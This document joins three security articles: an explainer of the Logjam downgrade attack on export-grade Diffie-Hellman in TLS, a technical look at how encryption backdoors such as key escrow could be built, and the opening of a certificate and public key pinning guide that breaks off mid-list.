It appears that the the Diffie-Hellman protocol, as currently deployed in SSL/TLS, may be vulnerable to a serious downgrade attack that restores it to 1990s “export” levels of security, and offers a practical “break” of the TLS protocol against poorly configured servers. Even worse, extrapolation of the attack requirements — combined with evidence from the Snowden documents — provides some reason to speculate that a similar attack could be leveraged against protocols (including TLS, IPSec/IKE and SSH) using 768- and 1024-bit Diffie-Hellman.

I’m going to tackle this post in the usual ‘fun’ question-and-answer format I save for this sort of thing.

What is Diffie-Hellman and why should I care about TLS “export” ciphersuites?

Diffie-Hellman is probably the most famous public key cryptosystem ever invented. Publicly discovered by Whit Diffie and Martin Hellman in the late 1970s (and a few years earlier, in secret, by UK GCHQ), it allows two parties to negotiate a shared encryption key over a public connection.

Diffie-Hellman is used extensively in protocols such as SSL/TLS and IPSec, which rely on it to establish the symmetric keys that are used to transport data. To do this, both parties must agree on a set of parameters to use for the key exchange. In traditional (‘mod p‘) Diffie-Hellman, these parameters consist of a large prime number p, as well as a ‘generator’ g. The two parties now exchange keys as shown below:

Classical Diffie-Hellman (source).

TLS supports several variants of Diffie-Hellman. The one we’re interested in for this work is the ‘ephemeral’ non-elliptic (“DHE”) protocol variant, which works in a manner that’s nearly identical to the diagram above. The server takes the role of Alice, selecting (p, g, ga mod p)and signing this tuple (and some nonces) using its long-term signing key. The client responds gb mod p and the two sides then calculate a shared secret.

Just for fun, TLS also supports an obsolete ‘export’ variant of Diffie-Hellman. These export ciphersuites are a relic from the 1990s when it was illegal to ship strong encryption out of the country. What you need to know about “export DHE” is simple: it works identically to standard DHE, but limits the size of p to 512 bits. Oh yes, and it’s still out there today. Because the Internet.

How do you attack Diffie-Hellman?

The best known attack against a correct Diffie-Hellman implementation involves capturing the value gand solving to find the secret key a. The problem of finding this value is known as the discrete logarithm problem, and it’s thought to be a mathematically intractable, at least when Diffie-Hellman is implemented in cryptographically strong groups (e.g., when p is of size 2048 bits or more).

Unfortunately, the story changes dramatically when p is relatively small — for example, 512 bits in length. Given a value gmod p for a 512-bit p, itshould at least be possible to efficiently recover the secret a and read traffic on the connection.

Most TLS servers don’t use 512-bit primes, so who cares?

The good news here is that weak Diffie-Hellman parameters are almost never used purposely on the Internet. Only a trivial fraction of the SSL/TLS servers out there today will organically negotiate 512-bit Diffie-Hellman. For the most part these are crappy embedded devices such as routers and video-conferencing gateways.
However, there is a second class of servers that are capable of supporting 512-bit Diffie-Hellman when clients request it, using a special mode called the ‘export DHE’ ciphersuite. Disgustingly, these servers amount to about 8% of the Alexa top million sites (and a whopping 29% of SMTP/STARTLS mail servers). Thankfully, most decent clients (AKA popular browsers) won’t willingly negotiate ‘export-DHE’, so this would also seem to be a dead end.
It isn’t.
ServerKeyExchange message (RFC 5246)
You see, before SSL/TLS peers can start engaging in all this fancy cryptography, they first need to decide which ciphers they’re going to use. This is done through a negotiation process in which the client proposes some options (e.g., RSA, DHE, DHE-EXPORT), and the server picks one.

This all sound simple enough. However, one of the early, well known flaws in SSL/TLS is the protocol’s failure to properly authenticate these ‘negotiation’ messages. In very early versions of SSL they were not authenticated at all. SSLv3 and TLS tacked on an authentication process — but one that takes place only at the end of the handshake.*

This is particularly unfortunate given that TLS servers often have the ability to authenticate their messages using digital signatures, but don’t really take advantage of this. For example, when two parties negotiate Diffie-Hellman, the parameters sent by the server are transmitted within a signed message called the ServerKeyExchange (shown at right). The signed portion of this message covers the parameters, but neglects to include any information about which ciphersuite the server thinks it’s negotiating. If you remember that the only difference between DHE and DHE-EXPORT is the size of the parameters the server sends down, you might start to see the problem.

Here it is in a nutshell: if the server supports DHE-EXPORT, the attacker can ‘edit’ the negotiation messages sent from the a client — even if the client doesn’t support export DHE — replacing the client’s list of supported ciphers with only export DHE. The server will in turn send back a signed 512-bit export-grade Diffie-Hellman tuple, which the client will blindly accept — because it doesn’t realize that the server is negotiating the export version of the ciphersuite.From its perspective this message looks just like ‘standard’ Diffie-Hellman with really crappy parameters.

Overview of the Logjam active attack (source: paper).

All this tampering should run into a huge snag at the end of the handshake, when he client and server exchange Finished messages embedding include a MAC of the transcript. At this point the client should learn that something funny is going on, i.e., that what it sent no longer matches what the server is seeing. However, the loophole is this: if the attacker can recover the Diffie-Hellman secret quickly — before the handshake ends — she can forge her own Finished messages. In that case the client and server will be none the wiser.

The upshot is that executing this attack requires the ability to solve a 512-bit discrete logarithm before the client and server exchange Finished messages. That seems like a tall order.

Can you really solve a discrete logarithm before a TLS handshake times out?

In practice, the fastest route to solving the discrete logarithm in finite fields is via an algorithm called the Number Field Sieve (NFS). Using NFS to solve a single 512-bit discrete logarithm instance requires several core-years — or about week of wall-clock time given a few thousand cores — which would seem to rule out solving discrete logs in real time.

However, there is a complication. In practice, NFS can actually be broken up into two different steps:

  1. Pre-computation (for a given prime p). This includes the process of polynomial selection, sieving, and linear algebra, all of which depend only on p. The output of this stage is a table for use in the second stage.
  2. Solving to find a (for a given gmod p). The final stage, called the descent, uses the table from the precomputation. This is the only part of the algorithm that actually involves a specific g and ga.
The important thing to know is that the first stage of the attack consumes the vast majority of the time, up to a full week on a large-scale compute cluster. The descent stage, on the other hand, requires only a few core-minutes. Thus the attack cost depends primarily on where the server gets its Diffie-Hellman parameters from. The best case for an attacker is when p is hard-coded into the server software and used across millions of machines. The worst case is when p is re-generated routinely by the server.

I’ll let you guess what real TLS servers actually do.
In fact, large-scale Internet scans by the team at University of Michigan show that most popular web servers software tends to re-use a small number of primes across thousands of server instances. This is done because generating prime numbers is scary, so implementers default to using a hard-coded value or a config file supplied by your Linux distribution. The situation for export Diffie-Hellman is particularly awful, with only two (!) primes used across up 92% of enabled Apache/mod_ssl sites.

Number of seconds to solve a
512-bit discrete log (source: paper).

The upshot of all of this is that about two weeks of pre-computation is sufficient to build a table that allows you to perform the downgrade against most export-enabled servers in just a few minutes (see the chart at right). This is fast enough that it can be done before the TLS connection timeout. Moreover, even if this is not fast enough, the connection can often be held open longer by using clever protocol tricks, such as sending TLS warning messages to reset the timeout clock.

Keep in mind that none of this shared prime craziness matters when you’re using sufficiently large prime numbers (on the order of 2048 bits or more). It’s only a practical issue you’re using small primes, like 512-bit, 768-bit or — and here’s a sticky one I’ll come back to in a minute — 1024 bit.

How do you fix the downgrade to export DHE?

The best and most obvious fix for this problem is to exterminate export ciphersuites from the Internet. Unfortunately, these awful configurations are the default in a number of server software packages (looking at you Postfix), and getting people to update their configurations is surprisingly difficult (see e.g., FREAK).

A simpler fix is to upgrade the major web browsers to resist the attack. The easy way to do this is to enforce a larger minimum size for received DHE keys. The problem here is that the fix itself causes some collateral damage — it will break a small but significant fraction of lousy servers that organically negotiate (non-export) DHE with 512 bit keys.

The good news here is that the major browsers have decided to break the Internet (a little) rather than allow it to break them. Each has agreed to raise the minimum size limit to at least 768 bits, and some to a minimum of 1024 bits. It’s still not perfect, since 1024-bit DHE may not be cryptographically sound against powerful attackers, but it does address the immediate export attack. In the longer term the question is whether to use larger negotiated DHE groups, or abandon DHE altogether and move to elliptic curves.

What does this mean for larger parameter sizes?

The good news so far is that 512-bit Diffie-Hellman is only used by a fraction of the Internet,even when you account for active downgrade attacks. The vast majority of servers use Diffie-Hellman moduli of length at least 1024 bits. (The widespread use of 1024 is largely due to a hard-cap in older Java clients. Go away Java.)

While 2048-bit moduli are generally believed to be outside of anyone’s reach, 1024-bit DHE has long been considered to be at least within groping range of nation-state attackers. We’ve known this for years, of course, but the practical implications haven’t been quite clear. This paper tries to shine some light on that, using Internet-wide measurements and software/hardware estimates.

If you recall from above, the most critical aspect of the NFS attack is the need to perform large amounts of pre-computation on a given Diffie-Hellman prime p, followed by a relatively short calculation to break any given connection that uses p. At the 512-bit size the pre-computation only requires about a week. The question then is, how much does it cost for a 1024-bit prime, and how common are shared primes?

While there’s no exact way to know how much the 1024-bit attack would cost, the paper attempts to provide some extrapolations based on current knowledge. With software, the cost of the pre-computation seems quite high — on the order of 35 million core-years. Making this happen for a given prime within a reasonable amount of time (say, one year) would appear to require billions of dollars of computing equipment if we assume no algorithmic improvements.Even if we rule out such improvements, it’s conceivable that this cost might be brought down to a few hundred million dollars using hardware. This doesn’t seem out of bounds when you consider leaked NSA cryptanalysis budgets.

What’s interesting is that the descent stage, required to break a given Diffie-Hellman connection, is much faster. Based on some implementation experiments by the CADO-NFSteam, it may be possible to break a Diffie-Hellman connection in as little as 30 core-days, with parallelization hugely reducing the wall-clock time. This might even make near-real-time decryption of Diffie-Hellman connections practical.

Is the NSA actually doing this?

So far all we’ve noted is that NFS pre-computation is at least potentially feasible when 1024-bit primes are re-used. That doesn’t mean the NSA is actually doing any of it.

There is some evidence, however, that suggests the NSA has decryption capability that’s at least consistent with such a break. This evidence comes from a series of Snowden documents published last winter in Der Spiegel. Together they describe a large-scale effort at NSA and GCHQ, capable of decrypting ‘vast’ amounts of Internet traffic, including IPSec, SSH and HTTPS connections.

NSA slide illustrating exploitation
of IPSec encrypted traffic (source: Spiegel).

While the architecture described by the documents mentions attacks against many protocols, the bulk of the energy seems to be around the IPSec and IKE protocols, which are used to establish Virtual Private Networks (VPNs) between individuals and corporate networks such as financial institutions.

The nature of the NSA’s exploit is never made clear in the documents, but diagram at right gives a lot of the architectural details. The system involves collecting Internet Key Exchange (IKE) handshakes, transmitting them to the NSA’s Cryptanalysis and Exploitation Services (CES) enclave, and feeding them into a decryption system that controls substantial high performance computing resources to process the intercepted exchanges. This is at least circumstantially consistent with Diffie-Hellman cryptanalysis.

Of course it’s entirely possible that the attack is based on a bad random number generator, weak symmetric encryption, or any number of engineered backdoors. There are a few pieces of evidence that militate towards a Diffie-Hellman break, however:

  1. IPSec (or rather, the IKE key exchange) uses Diffie-Hellman for every single connection, meaning that it can’t be broken without some kind of exploit, although this doesn’t rule out the other explanations.
  2. The IKE exchange is particularly vulnerable to pre-computation, since IKE uses a small number of standardized prime numbers called the Oakley groups, which are going on 17 years old now. Large-scale Internet scanning by the Michigan team shows that a majority of responding IPSec endpoints will gladly negotiate using Oakley Group 1 (768 bit) or Group 2 (1024 bit), even when the initiator offers better options.
  3. The NSA’s exploit appears to require the entire IKE handshake as well as any pre-shared key (PSK). These inputs would be necessary for recovery of IKEv1 session keys, but are not required in a break that involves only symmetric cryptography.
  4. The documents explicitly rule out the use of malware, or rather, they show that such malware (‘TAO implants’) is in use — but that malware allows the NSA to bypass the IKE handshake altogether.

I would stipulate that beyond the Internet measurements and computational analysis, this remains firmly in the category of  ‘crazy-eyed informed speculation’. But while we can’t rule out other explanations, this speculation is certainly consistent with a hardware-optimized break of Diffie-Hellman 768 and 1024-bit, along with some collateral damage to SSH and related protocols.

So what next?

The paper gives a detailed set of recommendations on what to do about these downgrade attacks and (relatively) weak DHE groups. The website provides a step-by-step guide for server administrators. In short, probably the best long-term move is to switch to elliptic curves (ECDHE) as soon as possible. Failing this, clients and servers should enforce at least 2048-bit Diffie-Hellman across the Internet. If you can’t do that, stop using common primes.

Making this all happen on anything as complicated as the Internet will probably consume a few dozen person-lifetimes. But it’s something we have to do, and will do, to make the Internet work properly.

Notes:

* There are reasons for this. Some SSL/TLS ciphersuites (such as the RSA encryption-based ciphersuites) don’t use signatures within the protocol, so the only way to authenticate the handshake is to negotiate a ciphersuite, run the key exchange protocol, then use the resulting shared secret to authenticate the negotiation messages after the fact. But SSL/TLS DHE involves digital signatures, so it should be possible to achieve a stronger level of security than this. It’s unfortunate that the protocol does not.

How Do We Build Encryption Backdoors?


They say that history repeats itself, first as tragedy, then as farce. Never has this principle been more apparent than in this new piece by Washington Post reporters Ellen Nakashima and Barton Gellman: ‘As encryption spreads, U.S. grapples with clash between privacy, security‘.

The subject of the piece is a renewed effort by U.S. intelligence and law enforcement agencies to mandate ‘backdoors’ in modern encryption systems. This is ostensibly a reaction to the mass adoption of strong encryption in smartphones, and a general fear that police are about to lose wiretapping capability they’ve come to depend on.

This is not the first time we’ve been here. Back in the 1990s the Federal government went as far as to propose a national standard for ‘escrowed’ telephone encryption called the ‘Clipper’ chip. That effort failed in large part because the technology was terrible, but also because — at least at the time — the idea of ordinary citizens adopting end-to-end encryption was basically science fiction.

Thanks to the advent of smartphones and ‘on-by-default’ encryption in popular systems like Apple’s iMessage, and WhatsApp, Americans are finally using end-to-end encryption at large scale and seem to like it. This is scaring the bejesus out of the powers that be.

Hence crypto backdoors.

As you might guess, I have serious philosophical objections to the idea of adding backdoors to any encryption system — for excellent reasons I could spend thousands of words on. But I’m not going to do that. What I’d like to do in this post is put aside my own value judgements and try to take these government proposals at face value.

Thus the question I’m going to consider in this post:

Let’s pretend that encryption backdoors are a great idea. From a purely technical point of view, what do we need to do to implement them, and how achievable is it?

First some background.

End-to-end encryption 101

Modern encryption schemes break down into several categories. For the purposes of this discussion we’ll consider two: those systems for which the provider holds the key, and the set of systems where the provider doesn’t.

We’re not terribly interested in the first type of encryption, which includes protocols like SSL/TLS and Google Hangouts, since those only protect data at the the link layer, i.e.,until it reaches your provider’s servers. I think it’s fairly well established that if Facebook, Apple, Google or Yahoo can access your data, then the government can access it as well — simply by subpoenaing or compelling those companies. We’ve even seen how this can work.

The encryption systems we’re interested all belong to the second class — protocols where even the provider can’t decrypt your information. This includes:

This seems like a relatively short list, but in practice w’re talking about an awful lot of data. The iMessage and WhatsApp systems alone process billions of instant messages every day, and Apple’s device encryption is on by default for everyone with a recent(ly updated) iPhone.

How to defeat end-to-end encryption

If you’ve decided to go after end-to-end encryption through legal means, there are a relatively small number of ways to proceed.

By far the simplest is to simply ban end-to-end crypto altogether, or to mandate weak encryption. There’s some precedent for this: throughout the 1990s, the NSA forced U.S. companies to ship ‘export‘ grade encryption that was billed as being good enough for commercial use, but weak enough for governments to attack. The problem with this strategy is that attacks only get better — but legacy crypto never dies.

Fortunately for this discussion, we have some parameters to work with. One of these is that Washington seems to genuinely want to avoid dictating technological designs to Silicon Valley. More importantly, President Obama himself has stated that “there’s no scenario in which we don’t want really strong encryption“. Taking these statements at face value should mean that we can exclude outright crypto bans, mandated designs, and any modification has the effect of fundamentally weakening encryption against outside attackers.

If we mix this all together, we’re left with only two real options:

  1. Attacks on key distribution. In systems that depend on centralized, provider-operated key servers, such as WhatsApp, Facetime, Signal and iMessage,** governments can force providers to distribute illegitimate public keys, or register shadow devices to a user’s account. This is essentially a man-in-the-middle attack on encrypted communication systems.
  2. Key escrow. Just about any encryption scheme can be modified to encrypt a copy of a decryption (or session) key such that a ‘master keyholder’ (e.g., Apple, or the U.S. government) can still decrypt. A major advantage is that this works even for device encryption systems, which have no key servers to suborn.

Each approach requires some modifications to clients, servers or other components of the system.

Attacking key distribution

Key lookup request for Apple iMessage. The phone
number is shown at top right, and the response at bottom left.

Many end-to-end encrypted messaging systems, including WhatsApp and iMessage, generate a long-term public and secret keypair for every device you own. The public portion of this keypair is distributed to anyone who might want to send you messages. The secret key never leaves the device.

Before you can initiate a connection with your intended recipient, you first have to obtain a copy of the recipient’s public key. This is commonly handled using a key server that’s operated by the provider. The key server may hand back one, or multiple public keys (depending on how many devices you’ve registered). As long as those keys all legitimately belong to your intended recipient, everything works fine.

Intercepting messages is possible, however, if the provider is willing to substitute its own public keys — keys for which it (or the government) actually knows the secret half. In theory this is relatively simple — in practice it can be something of a bear, due to the high complexity of protocols such as iMessage.

Key fingerprints.

The main problem with key distribution attacks is — unlike a traditional wiretap — substitute keys are at least in theory detectable by the target. Some communication systems, like Signal, allow users to compare key fingerprints in order to verify that each received the right public key. Others, like iMessage and WhatsApp, don’t offer this technology — but could easily be modified to do so (even using third party clients). Systems like CONIKS may even automate this process in the future — allowing applications to monitor changes to their own keys in real time as they’re distributed by a server.

A final, and salient feature on the key distribution approach is that it allows only prospective eavesdropping — that is, law enforcement must first target a particular user, and only then can they eavesdrop on her connections. There’s no way to look backwards in time. I see this is a generally good thing. Others may disagree.

Key Escrow 

Structure of the Clipper ‘LEAF’.

The techniques above don’t help much for systems without public key servers, Moreover, they do nothing for systems that don’t use public keys at all, the prime example being device encryptionIn this case, the only real alternative is to mandate some sort of key escrow.

Abstractly, the purpose of an escrow system is to place decryption keys on file (‘escrow’ them) with some trusted authority, who can break them out when the need arises. In practice it’s usually a bit more complex.

The first wrinkle is that modern encryption systems often feature many decryption keys, some of which can be derived on-the-fly while the system operates. (Systems such as TextSecure/WhatsApp actually derive new encryption keys for virtually every message you send.) Users with encrypted devices may change their password from time to time.

To deal with this issue, a preferred approach is to wrap these session keys up (encrypt them) under some master public key generated by the escrow authority — and to store/send the resulting ciphertexts along with the rest of the encrypted data. In the 1990s Clipperspecification these ciphertexts were referred to as Law Enforcement Access Fields, or LEAFs.***

With added LEAFs in your protocol, wiretapping becomes relatively straightforward. Law enforcement simply intercepts the encrypted data — or obtains it from your confiscated device — extract the LEAFs, and request that the escrow authority decrypt them. You can find variants of this design dating back to the PGP era. In fact, the whole concept is deceptively simple — provided you don’t go farther than the whiteboard. 

Conceptual view of some encrypted data (left) and a LEAF (right).

It’s only when you get into the details of actually implementing key escrow that things get hairy. These schemes require you to alter every protocol in your encryption system, at a pretty fundamental level — in the process creating the mother of all security vulnerabilities — but, more significantly, they force you to think very seriously about who you trust to hold those escrow keys.

Who does hold the keys?

This is the million dollar question for any escrow platform. The Post story devotes much energy to exploring various proposals for doing this.

Escrow key management is make-or-break, since the key server represents a universal vulnerability in any escrowed communication system. In the present debate there appear to be two solutions on the table. The first is to simply dump the problem onto individual providers, who will be responsible for managing their escrow keys — using whatever technological means they deem appropriate. A few companies may get this right. Unfortunately, most companies suck at cryptography, so it seems reasonable to believe that the resulting systems will be quite fragile.

The second approach is for the government to hold the keys themselves. Since the escrow key is too valuable to entrust to one organization, one or more trustworthy U.S. departments would hold ‘shares‘ of the master key, and would cooperate to provide decryption on a case-by-case basis. This was, in fact, the approach proposed for the Clipper chip.

The main problem with this proposal is that it’s non-trivial to implement. If you’re going to split keys across multiple agencies, you have to consider how you’re going to store those keys, and how you’re going to recover them when you need to access someone’s data. The obvious approach — bring the key shares back together at some centralized location — seems quite risky, since the combined master key would be vulnerable in that moment.

A second approach is to use a threshold cryptosystem. Threshold crypto refers to a set of techniques for storing secret keys across multiple locations so that decryption can be done in place without recombining the key shares. This seems like an ideal solution, with only one problem: nobody has deployed threshold cryptosystems at this kind of scale before. In fact, many of the protocols we know of in this area have never even been implemented outside of the research literature. Moreover, it will require governments to precisely specify a set of protocols for tech companies to implement — this seems incompatible with the original goal of letting technologists design their own systems.

Software implementations

A final issue to keep in mind is the complexity of the software we’ll need to make all of this happen. Our encryption software is already so complex that it’s literally at the breaking point. (If you don’t believe me, take a look at OpenSSL’s security advisories for the last year) While adding escrow mechanisms seems relatively straightforward, it will actually require quite a bit of careful coding, something we’re just not good at.

Even if we do go forward with this plan, there are many unanswered questions. How widely can these software implementations be deployed? Will every application maker be forced to use escrow? Will we be required to offer a new set of system APIs in iOS, Windows and Android that we can use to get this right? Answering each of these questions will result in dramatic changes throughout the OS software stack. I don’t envy the poor developers who will have to answer them.

How do we force people to use key escrow?

Leaving aside the technical questions, the real question is: how do you force anyone to do this stuff? Escrow requires breaking changes to most encryption protocols; it’s costly as hell; and it introduces many new security concerns. Moreover, laws outlawing end-to-end encryption software seem destined to run afoul of the First Amendment.

I’m not a lawyer, so don’t take my speculation too seriously — but it seems intuitive to me that any potential legislation will be targeted at service providers, not software vendors or OSS developers. Thus the real leverage for mandating key escrow will apply to the Facebooks and Apples of the world. Your third-party PGP and OTR clients would be left alone, for the tiny percentage of the population who uses these tools.

Unfortunately, even small app developers are increasingly running their own back-end servers these days (e.g., Whisper Systems and Silent Circle) so this is less reassuring than it sounds. Probably the big takeaway for encryption app developers is that it might be good to think about how you’ll function in a world where it’s no longer possible to run your own back-end data transport service — and where other commercial services may not be too friendly to moving your data for you.

In conclusion

If this post has been more questions than answers, that’s because there really are no answers right now. A serious debate is happening in an environment that’s almost devoid of technical input, at least from technical people who aren’t part of the intelligence establishment.

And maybe that by itself is reason enough to be skeptical.

Notes:

  • Not an endorsement. I have many thoughts on Telegram’s encryption protocols, but they’re beyond the scope of this post.

** Telegram is missing from this list because their protocol doesn’t handle long term keys at all. Every single connection must be validated in person using a graphical key fingerprint, which is, quite frankly, terrible.

*** The Clipper chip used a symmetric encryption algorithm to encrypt the LEAF, which meant that the LEAF decryption key had to be present inside of every consumer device. This was completely nuts, and definitely a bullet dodged. It also meant that every single Clipper had to be implemented in hardware using tamper resistant chip manufacturing technology. It was a truly awful design.

Certificate and Public Key Pinning


Certificate and Public Key Pinning is a technical guide to implementing certificate and public key pinning as discussed at the Virginia chapter’spresentation Securing Wireless Channels in the Mobile Space. This guide is focused on providing clear, simple, actionable guidance for securing the channel in a hostile environment where actors could be malicious and the conference of trust a liability. Additional presentation material includedsupplement with code excerpts, Android sample program, iOS sample program, .Net sample program, and OpenSSL sample program.

A cheat sheet is available at Pinning Cheat Sheet.

Introduction

Secure channels are a cornerstone to users and employees working remotely and on the go. Users and developers expect end-to-end security when sending and receiving data – especially sensitive data on channels protected by VPN, SSL, or TLS. While organizations which control DNS and CA have likely reduced risk to trivial levels under most threat models, users and developers subjugated to other’s DNS and a public CA hierarchy are exposed to non-trivial amounts of risk. In fact, history has shown those relying on outside services have suffered chronic breaches in their secure channels.

The pandemic abuse of trust has resulted in users, developers and applications making security related decisions on untrusted input. The situation is somewhat of a paradox: entities such as DNS and CAs are trusted and supposed to supply trusted input; yet their input cannot be trusted. Relying on untrusted input for security related decisions is not only bad karma, it violates a number of secure coding principals (see, for example, OWASP’sInjection Theory and Data Validation).

Pinning effectively removes the “conference of trust”. An application which pins a certificate or public key no longer needs to depend on others – such as DNS or CAs – when making security decisions relating to a peer’s identity. For those familiar with SSH, you should realize that public key pinning is nearly identical to SSH’s StrictHostKeyChecking option. SSH had it right the entire time, and the rest of the world is beginning to realize the virtues of directly identifying a host or service by its public key.

Others who actively engage in pinning include Google and its browser Chrome. Chrome was successful in detecting the DigiNotar compromise which uncovered suspected interception by the Iranian government on its citizens. The initial report of the compromise can be found at Is This MITM Attack to Gmail’s SSL?; and Google Security’s immediate response at An update on attempted man-in-the-middle attacks.

What’s the problem?

Users, developers, and applications expect end-to-end security on their secure channels, but some secure channels are not meeting the expectation. Specifically, channels built using well known protocols such as VPN, SSL, and TLS can be vulnerable to a number of attacks.

Examples of past failures are listed on the discussion tab for this article. This cheat sheet does not attempt to catalogue the failures in the industry, investigate the design flaws in the scaffolding, justify the lack of accountability or liability with the providers, explain the race to the bottom in services, or demystify the collusion between, for example, Browsers and CAs. For additional reading, please visit PKI is Broken and The Internet is Broken.

Patient 0

The original problem was the Key Distribution Problem. Insecure communications can be transformed into a secure communication problem with encryption. Encrypted communications can be transformed into an identity problem with signatures. The identity problem terminates at the key distribution problem. They are the same problem.

The Cures

There are three cures for the key distribution problem. First is to have first hand knowledge of your partner or peer (i.e., a peer, server or service). This could be solved with SneakerNet. Unfortunately, SneakerNet does not scale and cannot be used to solve the key distribution problem.

The second is to rely on others, and it has two variants: (1) web of trust, and (2) hierarchy of trust. Web of Trust and Hierarchy of Trust solve the key distribution problem in a sterile environment. However, Web of Trust and Hierarchy of Trust each requires us to rely on others – or confer trust. In practice, trusting others is showing to be problematic.

What Is Pinning?

Pinning is the process of associating a host with their expected X509 certificate or public key. Once a certificate or public key is known or seen for a host, the certificate or public key is associated or ‘pinned’ to the host. If more than one certificate or public key is acceptable, then the program holds a pinset (taking from Jon Larimer and Kenny Root Google I/O talk). In this case, the advertised identity must match one of the elements in the pinset.

A host or service’s certificate or public key can be added to an application at development time, or it can be added upon first encountering the certificate or public key. The former – adding at development time – is preferred since preloading the certificate or public key out of band usually means the attacker cannot taint the pin. If the certificate or public key is added upon first encounter, you will be using key continuity. Key continuity can fail if the attacker has a privileged position during the first first encounter.

Pinning leverages knowledge of the pre-existing relationship between the user and an organization or service to help make better security related decisions. Because you already have information on the server or service, you don’t need to rely on generalized mechanisms meant to solve the key distribution problem. That is, you don’t need to turn to DNS for name/address mappings or CAs for bindings and status. One exception is revocation and it is discussed below in Pinning Gaps.

It is also worth mention that Pinning is not Stapling. Stapling sends both the certificate and OCSP responder information in the same request to avoid the additional fetches the client should perform during path validations.

When Do You Pin?

You should pin anytime you want to be relatively certain of the remote host’s identity or when operating in a hostile environment. Since one or both are almost always true, you should probably pin all the time.

A perfect case in point: during the two weeks or so of preparation for the presentation and cheat sheet, we’ve observed three relevant and related failures. First was Nokia/Opera willfully breaking the secure channel; second was DigiCert issuing a code signing certificate for malware; and third was Bit9’s loss of its root signing key. The environment is not only hostile, its toxic.

When Do You Whitelist?

If you are working for an organization which practices “egress filtering” as part of a Data Loss Prevention (DLP) strategy, you will likely encounterInterception Proxies. I like to refer to these things as “good” bad guys (as opposed to “bad” bad guys) since both break end-to-end security and we can’t tell them apart. In this case, do not offer to whitelist the interception proxy since it defeats your security goals. Add the interception proxy’s public key to your pinset after being instructed to do so by the folks in Risk Acceptance.

Note: if you whitelist a certificate or public key for a different host (for example, to accommodate an interception proxy), you are no longer pinning the expected certificates and keys for the host. Security and integrity on the channel could suffer, and it surely breaks end-to-end security expectations of users and organizations.

For more reading on interception proxies, the additional risk they bestow, and how they fail, see Dr. Matthew Green’s How do Interception Proxies fail? and Jeff Jarmoc’s BlackHat talk SSL/TLS Interception Proxies and Transitive Trust.

How Do You Pin?

The idea is to re-use the existing protocols and infrastructure, but use them in a hardened manner. For re-use, a program would keep doing the things it used to do when establishing a secure connection.

To harden the channel, the program would take advantage of the OnConnect callback offered by a library, framework or platform. In the callback, the program would verify the remote host’s identity by validating its certificate or public key. While pinning does not have to occur in an OnConnectcallback, its often most convenient because the underlying connection information is readily available.

What Should Be Pinned?

The first thing to decide is what should be pinned. For this choice, you have two options: you can (1) pin the certificate; or (2) pin the public key. If you choose public keys, you have two additional choices: (a) pin the subjectPublicKeyInfo; or (b) pin one of the concrete types such asRSAPublicKey or DSAPublicKey.

The three choices are explained below in more detail. I would encourage you to pin the subjectPublicKeyInfo because it has the public parameters (such as {e,n} for an RSA public key) and contextual information such as an algorithm and OID. The context will help you keep your bearings at times, and Figure 1 below shows the additional information available.

Encodings/Formats

For the purposes of this article, the objects are in X509-compatible presentation format (PKCS#1 defers to X509, both of which use ASN.1). If you have a PEM encoded object (for example, -----BEGIN CERTIFICATE-----, -----END CERTIFICATE-----), then convert the object to DER encoding. Conversion using OpenSSL is offered below in Format Conversions.

A certificate is an object which binds an entity (such as a person or organization) to a public key via a signature. The certificate is DER encoded, and has associated data or attributes such as Subject (who is identified or bound), Issuer (who signed it), Validity (NotBefore and NotAfter), and a Public Key.

A certificate has a subjectPublicKeyInfo. The subjectPublicKeyInfo is a key with additional information. The ASN.1 type includes an Algorithm ID, aVersion, and an extensible format to hold a concrete public key. Figures 1 and 2 below show different views of the same RSA key, which is the subjectPublicKeyInfo. The key is for the site random.org, and it is used in the sample programs and listings below.

Figure 1: subjectPublicKeyInfo dumped with dumpans1

Figure 2: subjectPublicKeyInfo under a hex editor

The concrete public key is an encoded public key. The key format will usually be specified elsewhere – for example, PKCS#1 in the case of RSA Public Keys. In the case of an RSA public key, the type is RSAPublicKey and the parameters {e,n} will be ASN.1 encoded. Figures 1 and 2 above clearly show the modulus (n at line 28) and exponent (e at line 289). For DSA, the concrete type is DSAPublicKey and the ASN.1 encoded parameters would be {p,q,g,y}.

Final takeaways: (1) a certificate binds an entity to a public key; (2) a certificate has a subjectPublicKeyInfo; and (3) a subjectPublicKeyInfo has an concrete public key. For those who want to learn more, a more in-depth discussion from a programmer’s perspective can be found at the Code Project’s article Cryptographic Interoperability: Keys.

Certificate

Certificate

The certificate is easiest to pin. You can fetch the certificate out of band for the website, have the IT folks email your company certificate to you, use openssl s_client to retrieve the certificate etc. When the certificate expires, you would update your application. Assuming your application has no bugs or security defects, the application would be updated every year or two.

At runtime, you retrieve the website or server’s certificate in the callback. Within the callback, you compare the retrieved certificate with the certificate embedded within the program. If the comparison fails, then fail the method or function.

There is a downside to pinning a certificate. If the site rotates its certificate on a regular basis, then your application would need to be updated regularly. For example, Google rotates its certificates, so you will need to update your application about once a month (if it depended on Google services). Even though Google rotates its certificates, the underlying public keys (within the certificate) remain static.

Public Key

Public Key

Public key pinning is more flexible but a little trickier due to the extra steps necessary to extract the public key from a certificate. As with a certificate, the program checks the extracted public key with its embedded copy of the public key.

There are two downsides two public key pinning. First, its harder to work with keys (versus certificates) since you usually must extract the key from the certificate. Extraction is a minor inconvenience in Java and .Net, buts its uncomfortable in Cocoa/CocoaTouch and OpenSSL. Second, the key is static and may violate key rotation policies.

Hashing

While the three choices above used DER encoding, its also acceptable to use a hash of the information (or other transforms). In fact, the original sample programs were written using digested certificates and public keys. The samples were changed to allow a programmer to inspect the objects with tools like dumpasn1 and other ASN.1 decoders.

Hashing also provides three additional benefits. First, hashing allows you to anonymize a certificate or public key. This might be important if you application is concerned about leaking information during decompilation and re-engineering.

Second, a digested certificate fingerprint is often available as a native API for many libraries, so its convenient to use.

Finally, an organization might want to supply a reserve (or back-up) identity in case the primary identity is compromised. Hashing ensures your adversaries do not see the reserved certificate or public key in advance of its use. In fact, Google’s IETF draft websec-key-pinning uses the technique.

What About X509?

PKI{X} and the Internet form an intersection. What Internet users expect and what they receive from CAs could vary wildly. For example, an Internet user has security goals, while a CA has revenue goals and legal goals. Many are surprised to learn that the user is often required to perform host identity verification even though the CA issued the certificate (the details are buried in CA warranties on their certificates and their Certification Practice Statement (CPS)).

There are a number of PKI profiles available. For the Internet, “Internet X.509 Public Key Infrastructure Certificate and Certificate Revocation List (CRL)”, also known as RFC 5280, is of interest. Since a certificate is specified in the ITU’s X509 standard, there are lots of mandatory and optional fields available for validation from both bodies. Because of the disjoint goals among groups, the next section provides guidance.

Mandatory Checks

All X509 verifications must include:

